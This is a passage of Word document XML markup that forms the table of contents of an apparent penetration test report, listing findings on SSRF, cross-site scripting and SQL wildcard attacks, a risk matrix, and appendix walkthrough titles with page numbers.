            <w:r w:rsidR="00545D13">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F74E21F" w14:textId="21F07BBC"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30" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding 2 – Server-side Request Forgery in User Profile Page</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488330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1213864C" w14:textId="7FD132B1"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1" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488331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1213CC95" w14:textId="72E5E6E2"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2" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488332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1C9C21BC" w14:textId="7B545ECD"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3" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488333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2CC6E637" w14:textId="375B6BD6"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4" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488334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657A994E" w14:textId="70307B62"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5" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risk Rating</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488335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2B58308F" w14:textId="3436AC0D"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6" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488336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714BB503" w14:textId="51B66DDB"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7" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488337 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00545D13">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="006C36D8" w14:textId="6B1A769D"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38" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding 3 - Cross-Site Scripting in Anonymous Question Page</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488338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5280AE98" w14:textId="0BA6253A"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39" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488339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2DB6EAEB" w14:textId="09DC1E04"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0" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488340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5D5EF550" w14:textId="0ADC1F69"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1" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488341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1EF5E3E4" w14:textId="59FA74CB"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2" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488342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5A3475E5" w14:textId="7E937A79"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3" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risk Rating</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488343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299BCAC1" w14:textId="5BB8ACBF"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4" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488344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58BE0B8E" w14:textId="514DF5C6"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5" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488345 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00545D13">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DCE1E55" w14:textId="7AAA2BA1"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46" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding 4 - SQL Wildcard Attack in API Documentation Page</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488346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376E4AE4" w14:textId="7F20CDAB"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7" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488347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1D3BE685" w14:textId="2CEA6EB2"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8" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488348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1E07400E" w14:textId="3F4756CE"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49" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488349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1731145B" w14:textId="782A1B6D"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50" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488350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50E6B489" w14:textId="617E54AA"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51" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risk Rating</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488351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3DA8BE91" w14:textId="29F6D350"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52" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488352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0DA38F81" w14:textId="38810726" w:rsidR="00FC2B1D" w:rsidRDefault="0046559C">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71488353" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488353 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00545D13">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56C4FEA3" w14:textId="080F1FDC" w:rsidR="00FC2B1D" w:rsidRDefault="0046559C">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71488354" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix I - Risk Matrix</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488354 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00545D13">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E698496" w14:textId="6383B1F2" w:rsidR="00FC2B1D" w:rsidRDefault="0046559C">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71488355" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix 2 - Additional Information</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488355 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00545D13">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11105260" w14:textId="33CF23DA"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56" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Section 1 – SQL Injection Exploitation Walkthrough</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488356 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00545D13">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A34E539" w14:textId="7292C52A"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57" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Section 2 – SSRF Exploitation Walkthrough</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488357 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00545D13">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A4A85F7" w14:textId="18D0F98D"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58" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
